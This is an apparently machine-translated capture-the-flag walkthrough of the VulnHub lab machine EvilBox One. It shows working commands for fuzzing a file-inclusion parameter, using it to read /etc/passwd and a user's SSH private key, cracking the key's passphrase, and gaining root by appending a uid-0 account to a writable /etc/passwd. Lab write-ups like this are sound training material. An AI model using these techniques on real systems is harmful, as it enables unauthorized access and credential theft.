After reading this article, I will teach you to play with vulnhub, the penetration test target machine -- evilbox one

Vulnhub Introduction to target machine ：

vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .

As always, we need to find flag that will do .

Vulnhub Target download ：

Official website address ：https://download.vulnhub.com/evilbox/EvilBox—One.ova

Vulnhub Target installation ：

After downloading, unzip the installation package And then use Oracle VM Open the can .

Vulnhub Detailed explanation of target vulnerability ：

①： information gathering ：

kali Use in netdiscover Discover the host

Infiltration machine ：kali IP ：192.168.0.101 Drone aircraft IP ：192.168.0.106

Use command ：nmap -sS -sV -A -n 192.168.0.106

Discovery turned on 22 Port and 80 port Visit 80 The port is apache Default page direct dirb Sweep the backstage

Let's visit first robots.txt There seems to be little information available Then scan dirb http://192.168.0.106/secret -X .php,.xml,.html

visit /secret/evil.php Found no information , But I feel this evil It means evil Use ffuf Fuzzy test .

②： Vulnerability discovery ：

apt-get install ffuf ## Installation tools

ffuf -c -r -u 'http://192.168.0.106/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

192.168.0.106/secret/evil.php?command = /etc/passwd

③：ssh Private key explosion ：

Found to have mowree user , stay mowree There are... In the user directory ssh Public key , Try to create a private key login ssh

 http://192.168.0.106/secret/evil.php?command=/home/mowree/.ssh/id_rsa

Put this string ssh Copy the private key to kaili Give authority And crack the password Otherwise, you can't log in

cd /usr/share//john/
./ssh2john.py id_rsa | tee hash
john hash --wordlist=rockyou.txt  

I've tried this many times I don't know why I can't crack it （ If you know why, you can send a private message ） Read other people's articles Get the code ：unicorn

ssh [email protected] -i id_rsa

④： Raise the right ：

Use command ：find / -perm /4000 2>/dev/null

Use command ：find / -perm /2000 2>/dev/null 2000

Find nothing to use Using command ：find / -writable 2>/dev/null | grep -v proc Find out /etc/passwd Have write permission

General idea ： Since you have write permission Sure openssl Generate the password Then edit /etc/passwd Generative hack The settings behind the encryption and root Just the same .

[email protected]:~$ openssl passwd -1 123456    #-1 Represents an encryption method 
$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/

hack:$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/:0:0:root:/root:/bin/bash
vi /etc/passwd  ## write in 
cat /etc/passwd  # Test for success ！

ps：（ Attention! there Red arrow basH Capitalized In fact, there was no No big problem ）

su Switch hack Account password ：123456 Just set Then is id Found to be root jurisdiction

⑤： obtain flag：

So far, we have obtained all flag, End of penetration test .

Vulnhub Target penetration summary ：

1.ffuf Use of tools for fuzzy testing （ Tools are powerful ！！）
2.openssl Raise the right Before this DC Series has also been done
3. adopt SSH Private key login and id_rsa Cracking the private key requires shh2john Script （ But I got stuck here and can't crack it ）

Knowledge point ：
General user's .ssh There will be three files in the directory :

id_rsa : Private key
authorized_keys : Authentication keyword file
id_rsa.pub : Public key

Because of the summer vacation, I haven't had a target machine for a long time Update it on a whim today It will be updated continuously in the future , It's not easy to create I hope that's helpful If you like it, please give me one button three times Your happiness is my greatest happiness ！！